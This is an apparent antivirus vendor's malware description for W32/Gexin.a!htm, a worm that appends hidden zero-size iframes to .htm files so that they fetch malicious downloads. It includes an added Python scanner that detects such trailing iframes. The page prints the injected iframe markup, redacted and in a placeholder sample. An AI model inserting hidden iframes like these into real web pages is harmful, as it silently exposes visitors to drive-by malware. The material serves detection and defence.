W32/Gexin.a!htm

This page shows the details and results of our analysis of the malware W32/Gexin.a!htm.

Overview

This detection is for HTML files that have had a malicious iframe inserted at the end of the file by the W32/Gexin.a worm.


Minimum DAT

5066 (2007-07-03)

Updated DAT

5178 (2007-12-05)

Minimum Engine

5.1.00

File Length

N/A

Description Added

2007-07-03

Description Modified

2007-12-06

Malware Proliferation

Characteristics

When an infected .htm file is run, it silently attempts to connect to a list of pre-defined websites and download other malicious files from these sites.

These malicious iframes have their height and width set to 0. This prevents users from noticing the iframes when the infected .htm files are run in "Internet Explorer".

Symptoms

W32/Gexin.a!htm infected files will have an iframe inserted at the end of the file as below:

<IfrAmE src=http://xxx.xxxxxx.com/[Removed] width=0 height=0></IfrAmE>
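A defender-side check for the symptom described above, as an added example that is not part of the original description: it flags .htm/.html files that end in a run of iframes whose width and height are both 0. The 4 KiB tail window, the function names and the sample host are assumptions made for this example.

```python
import re
from pathlib import Path

TAIL_BYTES = 4096  # assumption: the appended markup fits in the last 4 KiB
# A run of one or more iframe elements followed only by whitespace up to EOF.
TRAILING_RUN = re.compile(
    rb"(?:<iframe\b[^>]*>\s*(?:</iframe\s*>)?\s*)+\Z", re.IGNORECASE)
OPEN_TAG = re.compile(rb"<iframe\b([^>]*)>", re.IGNORECASE)
SRC = re.compile(rb"(?:^|\s)src\s*=\s*[\"']?([^\s\"'>]+)", re.IGNORECASE)


def _is_zero(attrs: bytes, name: bytes) -> bool:
    """True if attribute `name` is set to 0 (quoted or not, optional px)."""
    pat = rb"(?:^|\s)" + name + rb"\s*=\s*[\"']?0(?:px)?[\"']?(?=\s|$)"
    return re.search(pat, attrs, re.IGNORECASE) is not None


def hidden_trailing_iframes(data: bytes) -> list:
    """Return the src values of zero-size iframes at the very end of data."""
    run = TRAILING_RUN.search(data[-TAIL_BYTES:])
    if not run:
        return []
    found = []
    for tag in OPEN_TAG.finditer(run.group(0)):
        attrs = tag.group(1)
        if _is_zero(attrs, b"width") and _is_zero(attrs, b"height"):
            src = SRC.search(attrs)
            found.append(src.group(1).decode("latin-1") if src else "")
    return found


def scan_tree(root: str) -> dict:
    """Map each .htm/.html file under root to its suspicious iframe sources."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in (".htm", ".html"):
            srcs = hidden_trailing_iframes(path.read_bytes())
            if srcs:
                hits[str(path)] = srcs
    return hits


# Constructed samples (placeholder host, not a real indicator).
INFECTED = (b"<html><body>hello</body></html>\r\n"
            b"<IfrAmE src=http://host.example/x width=0 height=0></IfrAmE>")
CLEAN = b"<html><body><iframe src=a.htm width=300 height=200></iframe></body></html>"

if __name__ == "__main__":
    print(hidden_trailing_iframes(INFECTED), hidden_trailing_iframes(CLEAN))
```

A visible iframe inside the document body is not reported; only zero-size iframes that form the final bytes of the file are.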

Method of Infection

This worm searches the hard drive for files with the extension ".htm" and infects them by adding a malicious iframe at the end of the file.

Removal

A combination of the latest DATs and the Engine will be able to detect and remove this threat. AVERT recommends that users not trust seemingly familiar or safe file icons, particularly when received via P2P clients, IRC, email or other media where users can share files.

Variants